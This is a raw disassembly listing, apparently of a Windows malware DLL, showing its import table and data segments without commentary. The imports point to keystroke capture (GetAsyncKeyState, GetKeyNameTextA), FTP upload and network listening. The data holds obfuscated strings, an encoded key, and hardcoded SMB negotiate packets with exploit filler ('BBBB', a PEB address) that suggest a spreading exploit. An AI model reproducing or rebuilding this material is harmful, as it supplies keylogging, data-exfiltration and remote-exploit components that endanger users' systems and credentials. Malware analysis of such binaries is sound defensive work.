extrn ReadFile:dword ; CODE XREF: sub_100030D9+154�p
; .text:100059AE�p ...
; HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName,LPWIN32_FIND_DATAA lpFindFileData)
extrn FindFirstFileA:dword ; CODE XREF: sub_100024A5+4F2�p
; DATA XREF: sub_100024A5+4F2�r
; BOOL __stdcall FindNextFileA(HANDLE hFindFile,LPWIN32_FIND_DATAA lpFindFileData)
extrn FindNextFileA:dword ; CODE XREF: sub_100024A5+50C�p
; DATA XREF: sub_100024A5+50C�r
; BOOL __stdcall FileTimeToLocalFileTime(const FILETIME *lpFileTime,LPFILETIME lpLocalFileTime)
extrn FileTimeToLocalFileTime:dword ; CODE XREF: sub_100024A5+56D�p
; DATA XREF: sub_100024A5+56D�r
; BOOL __stdcall FileTimeToSystemTime(const FILETIME *lpFileTime,LPSYSTEMTIME lpSystemTime)
extrn FileTimeToSystemTime:dword ; CODE XREF: sub_100024A5+581�p
; DATA XREF: sub_100024A5+581�r
; BOOL __stdcall FindClose(HANDLE hFindFile)
extrn FindClose:dword ; CODE XREF: sub_100024A5+BCA�p
; DATA XREF: sub_100024A5+BCA�r
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_10002157+1CB�p
; DATA XREF: sub_10002157+1CB�r
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_10002157+2B4�p
; sub_100030D9+34�p ...
; DWORD __stdcall GetFileSize(HANDLE hFile,LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: sub_10002157+2F2�p
; sub_100030D9+4E�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_10002157+341�p
; start+1B2�p ...
;
; Imports from MSVCP60.dll
;
; public: __thiscall std::_Winit::~_Winit(void)
extrn ??1_Winit@std@@QAE@XZ:dword ; CODE XREF: sub_100020F5+8�p
; sub_10003D44+8�p ...
; public: __thiscall std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::~basic_string<char, struct std::char_traits<char>, class std::allocator<char>>(void)
extrn ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ:dword
; CODE XREF: .text:10001EA8�p
; sub_1000BC50+3�p ...
; public: __thiscall std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>(class basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::basic_string<char, struct std::char_traits<char>, class std::allocator<char>> const &)
extrn ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z:dword
; CODE XREF: .text:10001E93�p
; DATA XREF: .text:10001E93�r
; public: class std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>> & __thiscall std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::append(char const *)
extrn ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z:dword
; CODE XREF: .text:10001E54�p
; DATA XREF: .text:10001E54�r
; public: class std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>> & __thiscall std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::append(unsigned int, char)
extrn ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z:dword
; CODE XREF: .text:10001E36�p
; .text:10001E7F�p
; DATA XREF: ...
; public: void __thiscall std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::reserve(unsigned int)
extrn ?reserve@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z:dword
; CODE XREF: .text:10001D07�p
; DATA XREF: .text:10001D07�r
; public: __thiscall std::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::basic_string<char, struct std::char_traits<char>, class std::allocator<char>>(class basic_string<char, struct std::char_traits<char>, class std::allocator<char>>::allocator<char> const &)
extrn ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z:dword
; CODE XREF: .text:10001CEA�p
; DATA XREF: .text:10001CEA�r
; public: __thiscall std::ios_base::Init::Init(void)
extrn ??0Init@ios_base@std@@QAE@XZ:dword ; CODE XREF: sub_10002092+8�p
; sub_10003CE1+8�p ...
; public: __thiscall std::ios_base::Init::~Init(void)
extrn ??1Init@ios_base@std@@QAE@XZ:dword ; CODE XREF: sub_100020B4+8�p
; sub_10003D03+8�p ...
; public: __thiscall std::_Winit::_Winit(void)
extrn ??0_Winit@std@@QAE@XZ:dword ; CODE XREF: sub_100020D3+8�p
; sub_10003D22+8�p ...
;
; Imports from MSVCRT.dll
;
extrn _endthreadex:dword ; CODE XREF: sub_10001EBF+10E�p
; sub_10001EBF+1B2�p ...
; int __cdecl stricmp(const char *Str1,const char *Str2)
extrn _stricmp:dword ; CODE XREF: sub_10004CE4+4D�p
; sub_10004EA7+80�p ...
; size_t __cdecl strlen(const char *Str)
extrn __imp_strlen:dword ; DATA XREF: strlen�r
; void *__cdecl memcpy(void *Dst,const void *Src,size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
; void *__cdecl memset(void *Dst,int Val,size_t Size)
extrn __imp_memset:dword ; DATA XREF: memset�r
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_10001059+D�p
; sub_100010BA+10�p ...
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_1000113B+15�p
; sub_10001170+E8�p ...
extrn floor:dword ; CODE XREF: sub_10001C45+56�p
; DATA XREF: sub_10001C45+56�r
extrn __imp__ftol:dword ; DATA XREF: _ftol�r
extrn ceil:dword ; CODE XREF: .text:10001D6B�p
; DATA XREF: .text:10001D6B�r
extrn __CxxFrameHandler:dword ; DATA XREF: .text:loc_1000B966�r
; char *__cdecl itoa(int Val,char *DstBuf,int Radix)
extrn _itoa:dword ; CODE XREF: sub_10009C30+45�p
; sub_10009EF0+CA�p
; DATA XREF: ...
; int snprintf(char *Dest,size_t Count,const char *Format,...)
extrn _snprintf:dword ; CODE XREF: sub_10001EBF+7A�p
; sub_10001EBF+B1�p ...
; char *__cdecl strncat(char *Dest,const char *Source,size_t Count)
extrn strncat:dword ; CODE XREF: sub_10002157+241�p
; DATA XREF: sub_10002157+241�r
; char *__cdecl strtok(char *Str,const char *Delim)
extrn strtok:dword ; CODE XREF: sub_10002157+1BB�p
; sub_100024A5+66�p ...
; char *__cdecl strncpy(char *Dest,const char *Source,size_t Count)
extrn strncpy:dword ; CODE XREF: sub_10002157+74�p
; sub_10002157+25A�p ...
; int __cdecl strcmp(const char *Str1,const char *Str2)
extrn __imp_strcmp:dword ; DATA XREF: strcmp�r
; char *__cdecl strstr(const char *Str,const char *SubStr)
extrn strstr:dword ; CODE XREF: sub_1000329E+49E�p
; sub_1000329E+4D5�p ...
; void __cdecl srand(unsigned int Seed)
extrn srand:dword ; CODE XREF: start+F4�p
; sub_10007005+3F�p ...
; int __cdecl fclose(FILE *File)
extrn fclose:dword ; CODE XREF: start+C4�p
; DATA XREF: start+C4�r
; size_t __cdecl fwrite(const void *Str,size_t Size,size_t Count,FILE *File)
extrn fwrite:dword ; CODE XREF: start+B2�p
; DATA XREF: start+B2�r
; FILE *__cdecl fopen(const char *Filename,const char *Mode)
extrn fopen:dword ; CODE XREF: start+62�p
; DATA XREF: start+62�r
; int __cdecl rand()
extrn rand:dword ; CODE XREF: sub_10004608:loc_10004618�p
; sub_10006A3B+70�p ...
; int sscanf(const char *Src,const char *Format,...)
extrn sscanf:dword ; CODE XREF: sub_10004BF7+1F�p
; sub_10005C3D+54C�p ...
extrn _beginthreadex:dword ; CODE XREF: sub_10004C65+13�p
; DATA XREF: sub_10004C65+13�r
; void __cdecl exit(int Code)
extrn exit:dword ; CODE XREF: sub_10004EA7+19B�p
; sub_10007424+965�p
; DATA XREF: ...
; unsigned __int32 __cdecl strtoul(const char *Str,char **EndPtr,int Radix)
extrn strtoul:dword ; CODE XREF: sub_10005C3D+A0D�p
; DATA XREF: sub_10005C3D+A0D�r
; int __cdecl atoi(const char *Str)
extrn atoi:dword ; CODE XREF: sub_10005C3D+9A5�p
; sub_10005C3D+9BB�p ...
; char *__cdecl strcat(char *Dest,const char *Source)
extrn __imp_strcat:dword ; DATA XREF: strcat�r
; int __cdecl vsnprintf(char *DstBuf,size_t MaxCount,const char *Format,va_list ArgList)
extrn _vsnprintf:dword ; CODE XREF: sub_10007293+29�p
; sub_10007303+29�p
; DATA XREF: ...
; void __cdecl splitpath(const char *FullPath,char *Drive,char *Dir,char *Filename,char *Ext)
extrn _splitpath:dword ; CODE XREF: sub_10007424+1963�p
; DATA XREF: sub_10007424+1963�r
; __int32 __cdecl atol(const char *Str)
extrn atol:dword ; CODE XREF: sub_10007424+803�p
; DATA XREF: sub_10007424+803�r
extrn __imp___dllonexit:dword ; DATA XREF: __dllonexit�r
; _onexit_t __cdecl onexit(_onexit_t Func)
extrn _onexit:dword ; CODE XREF: __onexit+D�p
; DATA XREF: __onexit+D�r
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
extrn _adjust_fdiv:dword ; DATA XREF: _CRT_INIT(x,x,x):loc_1000BAE4�r
;
; Imports from SHELL32.dll
;
; HINSTANCE __stdcall ShellExecuteA(HWND hwnd,LPCSTR lpOperation,LPCSTR lpFile,LPCSTR lpParameters,LPCSTR lpDirectory,INT nShowCmd)
extrn ShellExecuteA:dword ; CODE XREF: start+DF�p
; sub_10004CE4+BE�p ...
;
; Imports from USER32.dll
;
; UINT __stdcall MapVirtualKeyExA(UINT uCode,UINT uMapType,HKL dwhkl)
extrn MapVirtualKeyExA:dword ; CODE XREF: sub_10007424+21BA�p
; DATA XREF: sub_10007424+21BA�r
; int __stdcall GetKeyNameTextA(LONG lParam,LPSTR lpString,int cchSize)
extrn GetKeyNameTextA:dword ; CODE XREF: sub_10007424+21DC�p
; DATA XREF: sub_10007424+21DC�r
; HKL __stdcall GetKeyboardLayout(DWORD idThread)
extrn GetKeyboardLayout:dword ; CODE XREF: sub_10007424+21AA�p
; DATA XREF: sub_10007424+21AA�r
; SHORT __stdcall GetAsyncKeyState(int vKey)
extrn GetAsyncKeyState:dword ; CODE XREF: sub_10007424+2197�p
; DATA XREF: sub_10007424+2197�r
;
; Imports from WININET.dll
;
extrn InternetConnectA:dword ; CODE XREF: sub_10005584+EE�p
; DATA XREF: sub_10005584+EE�r
extrn InternetCrackUrlA:dword ; CODE XREF: sub_10005584+C1�p
; DATA XREF: sub_10005584+C1�r
extrn InternetWriteFile:dword ; CODE XREF: sub_10005584+1B2�p
; DATA XREF: sub_10005584+1B2�r
extrn InternetCloseHandle:dword ; CODE XREF: sub_10005380+11F�p
; sub_10005380+129�p ...
extrn InternetOpenA:dword ; CODE XREF: start+32�p
; sub_10005380+35�p ...
extrn InternetOpenUrlA:dword ; CODE XREF: start+4C�p
; sub_10005380+51�p
; DATA XREF: ...
extrn InternetReadFile:dword ; CODE XREF: start+88�p
; sub_10005380+D8�p
; DATA XREF: ...
extrn FtpOpenFileA:dword ; CODE XREF: sub_10005584+11C�p
; DATA XREF: sub_10005584+11C�r
;
; Imports from WS2_32.dll
;
; u_short __stdcall ntohs(u_short netshort)
extrn ntohs:dword ; CODE XREF: sub_1000A1A9+17B�p
; sub_1000A1A9+1A1�p ...
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_10007424+300�p
; sub_1000A1A9+30D�p ...
; int __stdcall setsockopt(SOCKET s,int level,int optname,const char *optval,int optlen)
extrn setsockopt:dword ; CODE XREF: sub_10005C3D+99�p
; sub_10009E30+4A�p ...
; u_long __stdcall ntohl(u_long netlong)
extrn ntohl:dword ; CODE XREF: sub_10005C3D+2FA�p
; sub_10005C3D+30E�p ...
; unsigned __int32 __stdcall inet_addr(const char *cp)
extrn inet_addr:dword ; CODE XREF: sub_10005A70+21�p
; sub_10005C3D+307�p ...
; int __stdcall getsockname(SOCKET s,struct sockaddr *name,int *namelen)
extrn getsockname:dword ; CODE XREF: sub_10004C83+1C�p
; DATA XREF: sub_10004C83+1C�r
; struct hostent *__stdcall gethostbyaddr(const char *addr,int len,int type)
extrn gethostbyaddr:dword ; CODE XREF: sub_1000495F+C�p
; DATA XREF: sub_1000495F+C�r
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_10004763+8�p
; DATA XREF: sub_10004763+8�r
; int __stdcall WSAStartup(WORD wVersionRequested,LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: start+18B�p
; DATA XREF: start+18B�r
; int __stdcall sendto(SOCKET s,const char *buf,int len,int flags,const struct sockaddr *to,int tolen)
extrn sendto:dword ; CODE XREF: sub_10003D60+CC�p
; sub_10003D60+100�p ...
; int __stdcall bind(SOCKET s,const struct sockaddr *name,int namelen)
extrn bind:dword ; CODE XREF: sub_1000329E+B3�p
; sub_10005C3D+103�p ...
; int __stdcall listen(SOCKET s,int backlog)
extrn listen:dword ; CODE XREF: sub_1000329E+CE�p
; sub_10005C3D+133�p ...
; int __stdcall ioctlsocket(SOCKET s,__int32 cmd,u_long *argp)
extrn ioctlsocket:dword ; CODE XREF: sub_1000329E+F0�p
; sub_1000329E+624�p ...
; SOCKET __stdcall accept(SOCKET s,struct sockaddr *addr,int *addrlen)
extrn accept:dword ; CODE XREF: sub_1000329E+261�p
; sub_10005C3D+2C7�p ...
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_100030D9+186�p
; sub_10005AE8+10C�p
; DATA XREF: ...
; SOCKET __stdcall socket(int af,int type,int protocol)
extrn socket:dword ; CODE XREF: sub_10001EBF+11D�p
; sub_1000329E+8A�p ...
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_10001EBF+13D�p
; sub_1000329E+5A�p ...
; int __stdcall connect(SOCKET s,const struct sockaddr *name,int namelen)
extrn connect:dword ; CODE XREF: sub_10001EBF+176�p
; sub_10003D60+99�p ...
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_10001EBF+19F�p
; sub_10002157+1FB�p ...
; u_long __stdcall htonl(u_long hostlong)
extrn htonl:dword ; CODE XREF: sub_10001991+8�p
; DATA XREF: sub_10001991+8�r
; int __stdcall send(SOCKET s,const char *buf,int len,int flags)
extrn send:dword ; CODE XREF: sub_10001991+1D�p
; sub_10001991+3A�p ...
; int __stdcall select(int nfds,fd_set *readfds,fd_set *writefds,fd_set *exceptfds,const struct timeval *timeout)
extrn select:dword ; CODE XREF: sub_1000180B+145�p
; sub_1000329E+1DB�p ...
; int __stdcall __WSAFDIsSet(SOCKET fd,fd_set *)
extrn __imp___WSAFDIsSet:dword ; DATA XREF: __WSAFDIsSet�r
; int __stdcall recv(SOCKET s,char *buf,int len,int flags)
extrn recv:dword ; CODE XREF: sub_1000180B+17C�p
; sub_1000329E+360�p ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 1000C218h
dbl_1000C218 dq 7.2e1 ; DATA XREF: sub_10001C45+4A�r
dbl_1000C220 dq 6.0 ; DATA XREF: sub_10001C45+19�r
; .text:10001D5F�r
dbl_1000C228 dq 8.0 ; DATA XREF: .text:10001D59�r
byte_1000C230 db 0Ah ; DATA XREF: sub_1000504C+FC�r
; sub_1000504C+112�o
aXh7Wj7 db 'xh7}`wj7{|',0
dd 1FDh dup(0)
dword_1000CA30 dd 2B292B04h, 28h, 1Eh dup(0) ; DATA XREF: sub_1000504C+25�o
dword_1000CAB0 dd 20h dup(0) ; DATA XREF: sub_1000504C+41�o
aZuvj db 7,':zuvj|:',0 ; DATA XREF: sub_1000504C+5D�o
align 4
dd 1Dh dup(0)
dword_1000CBB0 dd 20h dup(0) ; DATA XREF: sub_1000504C+79�o
dword_1000CC30 dd 33593303h, 1Fh dup(0) ; DATA XREF: sub_1000504C+95�o
aZuvj_0 db 8,':zuvj|:(',0 ; DATA XREF: sub_1000504C+B1�o
align 4
dd 1Dh dup(0)
aNpwfju7A db 0Bh,'npwFju+7|a|',0 ; DATA XREF: sub_1000504C+CD�o
align 10h
dd 1Ch dup(0)
; char a7xoaredq6lsnv6[]
a7xoaredq6lsnv6 db '7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4ZYt7w1AI4cGXjANm227bWe26t',0
; DATA XREF: sub_1000504C+4�o
; sub_1000504C+20�o ...
align 8
stru_1000CDF8 dd 19930520h ; Magic ; DATA XREF: .text:loc_1000BC72�o
dd 2 ; Count
dd offset stru_1000CDF8.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_1000BC5A ; Info.Proc
dd 0 ; Info.Id
dd offset sub_1000BC50 ; Info.Proc
dd 0D090h, 2 dup(0)
dd 0D0F4h, 0C1B4h, 0D050h, 2 dup(0)
dd 0D110h, 0C174h, 0CEDCh, 2 dup(0)
dd 0D170h, 0C000h, 0D06Ch, 2 dup(0)
dd 0D218h, 0C190h, 0D058h, 2 dup(0)
dd 0D272h, 0C17Ch, 0CF90h, 2 dup(0)
dd 0D4E0h, 0C0B4h, 0CFBCh, 2 dup(0)
dd 0D626h, 0C0E0h, 0CEF4h, 2 dup(0)
dd 0D8FEh, 0C018h, 5 dup(0)
dd 0D13Ah, 0D15Eh, 0D14Ch, 0D12Ch, 0D11Ch, 0
dd 0D8AEh, 0D89Ch, 0D88Ch, 0D87Eh, 0D86Ch, 0D858h, 0D848h
dd 0D83Ch, 0D826h, 0D81Ah, 0D8CAh, 0D7EEh, 0D7DEh, 0D7CAh
dd 0D7BAh, 0D7AAh, 0D79Ah, 0D784h, 0D76Eh, 0D75Ch, 0D74Ah
dd 0D8DEh, 0D8ECh, 0D67Eh, 0D66Eh, 0D804h, 0D73Ch, 0D72Ah
dd 0D71Eh, 0D70Ch, 0D6FCh, 0D6E2h, 0D6CAh, 0D6BEh, 0D6A8h
dd 0D69Ah, 0D68Ch, 0D666h, 0
dd 0D4C8h, 0D27Eh, 0D2C8h, 0D318h, 0D36Eh, 0D3C4h, 0D414h
dd 0D470h, 0D490h, 0D4B0h, 0
dd 0D548h, 0D90Ch, 0D4ECh, 0D4F6h, 0D500h, 0D50Ah, 0D514h
dd 0D51Ch, 0D524h, 0D52Ch, 0D534h, 0D918h, 0D558h, 0D564h
dd 0D56Eh, 0D578h, 0D582h, 0D58Ch, 0D596h, 0D59Eh, 0D5A8h
dd 0D5B2h, 0D5BAh, 0D5C2h, 0D5CCh, 0D5DEh, 0D5E6h, 0D5F0h
dd 0D5F8h, 0D602h, 0D610h, 0D61Eh, 0D632h, 0D640h, 0D64Ah
dd 0D656h, 0
dd 0D100h, 0
dd 0D236h, 0D224h, 0D24Ah, 0D25Eh, 0
dd 0D1F0h, 0D204h, 0D1CCh, 0D1B6h, 0D1A6h, 0D192h, 0D17Eh
dd 0D1E0h, 0
dd 8000000Fh, 8000000Ch, 80000015h, 8000000Eh, 8000000Bh
dd 80000006h, 80000033h, 80000034h, 80000073h, 80000014h
dd 80000002h, 8000000Dh, 8000000Ah, 80000001h, 8000006Fh
dd 80000017h, 80000009h, 80000004h, 80000003h, 80000008h
dd 80000013h, 80000012h, 80000097h, 80000010h, 0
aWs2_32_dll db 'WS2_32.dll',0
align 10h
aR db 'r',0
aShellexecutea db 'ShellExecuteA',0
aShell32_dll db 'SHELL32.dll',0
db '×',0
aGetusernamea db 'GetUserNameA',0
align 4
dd 6552015Bh, 6F6C4367h, 654B6573h, 1860079h, 53676552h
dd 61567465h, 4565756Ch, 4178h, 6552015Fh, 65724367h, 4B657461h
dd 78457965h, 1640041h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 41564441h, 32334950h, 6C6C642Eh, 770000h, 65746E49h
dd 74656E72h, 64616552h, 656C6946h, 710000h, 65746E49h
dd 74656E72h, 6E65704Fh, 416C7255h, 6F0000h, 65746E49h
dd 74656E72h, 6E65704Fh, 560041h, 65746E49h, 74656E72h
dd 736F6C43h, 6E614865h, 656C64h, 6E490088h, 6E726574h
dd 72577465h, 46657469h, 656C69h, 74460026h, 65704F70h
dd 6C69466Eh, 4165h, 6E49005Ah, 6E726574h, 6F437465h, 63656E6Eh
dd 4174h, 6E49005Ch, 6E726574h, 72437465h, 556B6361h, 416C72h
dd 494E4957h, 2E54454Eh, 6C6C64h, 65470110h, 79654B74h
dd 656D614Eh, 74786554h, 1B60041h, 5670614Dh, 75747269h
dd 654B6C61h, 41784579h, 1130000h, 4B746547h, 6F627965h
dd 4C647261h, 756F7961h, 0E30074h, 41746547h, 636E7973h
dd 5379654Bh, 65746174h, 53550000h, 32335245h, 6C6C642Eh
dd 0E90000h, 3F313F3Fh, 73616224h, 735F6369h, 6E697274h
dd 55444067h, 6863243Fh, 745F7261h, 74696172h, 40444073h
dd 40647473h, 243F5640h, 6F6C6C61h, 6F746163h, 40444072h
dd 73404032h, 40406474h, 40454151h, 5A58h, 3F3F0047h, 62243F30h
dd 63697361h, 7274735Fh, 40676E69h, 243F5544h, 72616863h
dd 6172745Fh, 40737469h, 74734044h, 56404064h, 6C61243Fh
dd 61636F6Ch, 40726F74h, 40324044h, 64747340h, 41514040h
dd 42414045h, 40313056h, 5A40h, 613F0410h, 6E657070h, 243F4064h
dd 69736162h, 74735F63h, 676E6972h, 3F554440h, 61686324h
dd 72745F72h, 73746961h, 73404440h, 40406474h, 61243F56h
dd 636F6C6Ch, 726F7461h, 32404440h, 74734040h, 51404064h
dd 41414541h, 40323156h, 40444250h, 40E005Ah, 7070613Fh
dd 40646E65h, 6162243Fh, 5F636973h, 69727473h, 4440676Eh
dd 63243F55h, 5F726168h, 69617274h, 44407374h, 64747340h
dd 3F564040h, 6C6C6124h, 7461636Fh, 4440726Fh, 40403240h
dd 40647473h, 45415140h, 31564141h, 44494032h, 5A40h, 723F071Bh
dd 72657365h, 3F406576h, 73616224h, 735F6369h, 6E697274h
dd 55444067h, 6863243Fh, 745F7261h, 74696172h, 40444073h
dd 40647473h, 243F5640h, 6F6C6C61h, 6F746163h, 40444072h
dd 73404032h, 40406474h, 58454151h, 5A4049h, 3F3F0049h
dd 62243F30h, 63697361h, 7274735Fh, 40676E69h, 243F5544h
dd 72616863h, 6172745Fh, 40737469h, 74734044h, 56404064h
dd 6C61243Fh, 61636F6Ch, 40726F74h, 40324044h, 64747340h
dd 41514040h, 42414045h, 61243F56h, 636F6C6Ch, 726F7461h
dd 31404440h, 5A4040h, 3F3F009Eh, 696E4930h, 6F694074h
dd 61625F73h, 73406573h, 40406474h, 40454151h, 5A58h, 3F3F0109h
dd 696E4931h, 6F694074h, 61625F73h, 73406573h, 40406474h
dd 40454151h, 5A58h, 3F3F00A5h, 69575F30h, 4074696Eh, 40647473h
dd 45415140h, 5A5840h, 3F3F010Dh, 69575F31h, 4074696Eh
dd 40647473h, 45415140h, 5A5840h, 4356534Dh, 2E303650h
dd 6C6C64h, 747302BEh, 6E656C72h, 2970000h, 636D656Dh
dd 7970h, 656D0299h, 7465736Dh, 2910000h, 6C6C616Dh, 636Fh
dd 7266025Eh, 6565h, 6C660255h, 726F6Fh, 665F00F1h, 6C6F74h
dd 65630241h, 6C69h, 5F5F0049h, 46787843h, 656D6172h, 646E6148h
dd 72656Ch, 655F00C5h, 6874646Eh, 64616572h, 7865h, 735F01AEh
dd 6972706Eh, 66746Eh, 747302BFh, 61636E72h, 2C70074h
dd 74727473h, 6B6Fh, 747302C1h, 70636E72h, 2B80079h, 63727473h
dd 706Dh, 747302C5h, 72747372h, 2B40000h, 6E617273h, 24C0064h
dd 6F6C6366h, 6573h, 77660266h, 65746972h, 2570000h, 65706F66h
dd 2A6006Eh, 646E6172h, 2B50000h, 61637373h, 666Eh, 625F00A6h
dd 6E696765h, 65726874h, 78656461h, 2490000h, 74697865h
dd 2C90000h, 74727473h, 6C756Fh, 7461023Dh, 696Fh, 747302B6h
dd 74616372h, 1E10000h, 6E73765Fh, 6E697270h, 6674h, 735F01B9h
dd 74696C70h, 68746170h, 23E0000h, 6C6F7461h, 534D0000h
dd 54524356h, 6C6C642Eh, 550000h, 6C645F5Fh, 656E6F6Ch
dd 746978h, 6F5F0186h, 6978656Eh, 10F0074h, 696E695Fh
dd 72657474h, 9D006Dh, 6A64615Fh, 5F747375h, 76696466h
dd 2960000h, 65656C53h, 4A0070h, 61657243h, 68546574h
dd 64616572h, 1B0000h, 736F6C43h, 6E614865h, 656C64h, 65470112h
dd 6C694674h, 7A695365h, 340065h, 61657243h, 69466574h
dd 41656Ch, 6547010Dh, 6C694674h, 74744165h, 75626972h
dd 41736574h, 900000h, 646E6946h, 736F6C43h, 8A0065h, 656C6946h
dd 656D6954h, 79536F54h, 6D657473h, 656D6954h, 890000h
dd 656C6946h, 656D6954h, 6F4C6F54h, 466C6163h, 54656C69h
dd 656D69h, 6946009Dh, 654E646Eh, 69467478h, 41656Ch, 69460094h
dd 6946646Eh, 46747372h, 41656C69h, 2180000h, 64616552h
dd 656C6946h, 26A0000h, 46746553h, 50656C69h, 746E696Fh
dd 7265h, 7845007Eh, 68547469h, 64616572h, 16E0000h, 54746547h
dd 46656D69h, 616D726Fh, 4174h, 654700FBh, 74614474h, 726F4665h
dd 4174616Dh, 1240000h, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 4165h, 615702CEh, 6F467469h, 6E695372h, 4F656C67h
dd 63656A62h, 3F0074h, 61657243h, 754D6574h, 41786574h
dd 16D0000h, 54746547h, 436B6369h, 746E756Fh, 2640000h
dd 45746553h, 726F7272h, 65646F4Dh, 0CE0000h, 43746547h
dd 75706D6Fh, 4E726574h, 41656D61h, 1750000h, 56746547h
dd 69737265h, 78456E6Fh, 18D0041h, 626F6C47h, 654D6C61h
dd 79726F6Dh, 74617453h, 7375h, 65470159h, 73795374h, 446D6574h
dd 63657269h, 79726F74h, 280041h, 79706F43h, 656C6946h
dd 2680041h, 46746553h, 41656C69h, 69727474h, 65747562h
dd 4173h, 725702DFh, 46657469h, 656C69h, 65470165h, 6D655474h
dd 74615070h, 4168h, 65470163h, 6D655474h, 6C694670h, 6D614E65h
dd 4165h, 6547011Ch, 636F4C74h, 49656C61h, 416F666Eh, 570000h
dd 656C6544h, 69466574h, 41656Ch, 725001FEh, 7365636Fh
dd 4E323373h, 747865h, 725001FCh, 7365636Fh, 46323373h
dd 74737269h, 4C0000h, 61657243h, 6F546574h, 65686C6Fh
dd 3233706Ch, 70616E53h, 746F6873h, 29E0000h, 6D726554h
dd 74616E69h, 6F725065h, 73736563h, 1EF0000h, 6E65704Fh
dd 636F7250h, 737365h, 6554029Fh, 6E696D72h, 54657461h
dd 61657268h, 454B0064h, 4C454E52h, 642E3233h, 6C6Ch, 735F01C1h
dd 63697274h, 706Dh, 695F0134h, 616F74h, 0
aLf db 'ÒÆ‹F',0
align 4
aR_0 db 'RÙ',0
align 10h
dd 3 dup(1), 0D948h, 0D94Ch, 0D950h, 420Dh, 0D95Bh, 6F6E0000h
dd 642E6570h, 73006C6Ch, 74726174h, 1A8h dup(0)
_rdata ends
; Section 3. (virtual address 0000E000)
; Virtual size : 0001F174 ( 127348.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 0000E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 1000E000h
dword_1000E000 dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+4F�o
dd offset sub_10002083
dd offset sub_100020C4
dd offset sub_10003CD2
dd offset sub_10003D13
dd offset sub_10004153
dd offset sub_10004194
dd offset sub_100052FD
dd offset sub_1000533E
dd offset sub_10005814
dd offset sub_10005855
dd offset sub_100059EC
dd offset sub_10005A2D
dd offset sub_10006893
dd offset sub_100068D4
dd offset sub_10006920
dd offset sub_10006961
dd offset sub_10006F20
dd offset sub_10006F61
dd offset sub_10009830
dd offset sub_10009871
dd offset sub_10009AA0
dd offset sub_10009AE1
dd offset sub_1000A6D0
dd offset sub_1000A711
dd offset sub_1000AC30
dd offset sub_1000AC71
dd offset sub_1000B0A0
dd offset sub_1000B0E1
dword_1000E074 dd 3 dup(0) ; DATA XREF: _CRT_INIT(x,x,x)+4A�o
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_10001433+CA�o
align 4
dword_1000E08C dd 10FF8h, 0 ; DATA XREF: sub_10001433+86�o
dword_1000E094 dd 10FF8h ; DATA XREF: sub_10001433+95�o
dword_1000E098 dd 7FFDF020h, 0 ; DATA XREF: sub_10001433+194�o
dword_1000E0A0 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_100019DF+14D�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_1000E128 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_100019DF+5F�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
